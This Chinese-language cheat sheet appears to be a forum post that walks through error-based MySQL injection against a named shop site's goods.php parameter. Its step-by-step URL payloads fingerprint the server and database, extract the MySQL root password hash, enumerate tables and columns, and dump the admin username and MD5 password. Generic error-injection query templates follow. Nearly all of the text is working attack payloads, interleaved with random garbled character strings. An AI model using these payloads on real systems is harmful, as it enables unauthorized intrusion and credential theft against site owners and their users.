判断版本号
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23& D% E0 ]! m( C) S+ y- r1 S2 O
判断系统
# t5 q4 ?8 g2 }8 z
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
8 p; }7 _8 m3 r+ _9 d# c% j) R; i. f/ D/ w
) {: z' Z& |5 d( ]2 ^
当前 user()
; b7 K6 x: k1 o2 p3 x- \ c& e
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23+ w( M \1 V- z8 F5 L. r7 G8 G
7 {! C8 x# S0 S" k0 v6 d% V9 B
9 T+ C0 u6 c0 v- v& W0 y7 {8 B( Y% n y5 k) N
当前 database()
* b& @, ^' G: L, _9 A$ rhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%238 \1 E/ k% c2 k3 A
+ q9 h9 a/ f7 ` o' D- Y) l. R
3 C- O5 y( N" D$ u, X+ T6 N# ~, j' T: Z; o: [+ ~1 S
$ N% R1 T1 X6 a! d" a: J$ A
root hash
; l! S" i8 x+ h; S @" C7 ~# ahttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
4 ]" N$ h4 |4 k4 H8 j
, |) W3 f) o. }
7 C# h# \+ G8 Y. Y
当前 数据库表名
. y* n( c3 R4 ]8 a" e. k7 S. w3 L: X) P3 _; |/ Z7 b! |. |
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
2 h! j7 O. Y1 e9 s- _# p) e2 {1 [# ~+ z$ o" j5 q
, w6 s- W' z8 b# f' {8 k
9 X5 x- p1 y+ {. ~- d
当前 数据库 user_name 字段
+ o* K6 r" [ b C' ~9 v7 Q! o- a' |7 _) ^. l5 N9 A
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 _- R6 ^, X4 a5 E( S# ~4 P
当前 数据库 字段 password
1 c8 D8 ^& I7 O2 c7 Vhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%233 d6 J7 V9 z. \8 a
0 _+ d* B0 R# i
: C7 Y# W$ ]6 I8 v% K9 `8 Y J ]: s" M# `
获得 admin passwd(md5)
8 s! P8 o5 k" r" n4 N! j5 F
% _9 Z' U' b5 R2 fhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23& X( F- j4 H7 @, g
" J* s% y0 g- R报错注射' o N; H2 r. z6 I2 Z
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
) c4 i; H. `, H8 q. U- ~2 N7 }% w2 ?: ?9 ]1 h, s7 e0 E+ q
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
$ ~0 J8 M" Y$ f7 d. Y; l) Q \2 e' B4 Y$ B; ?$ d8 g
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) |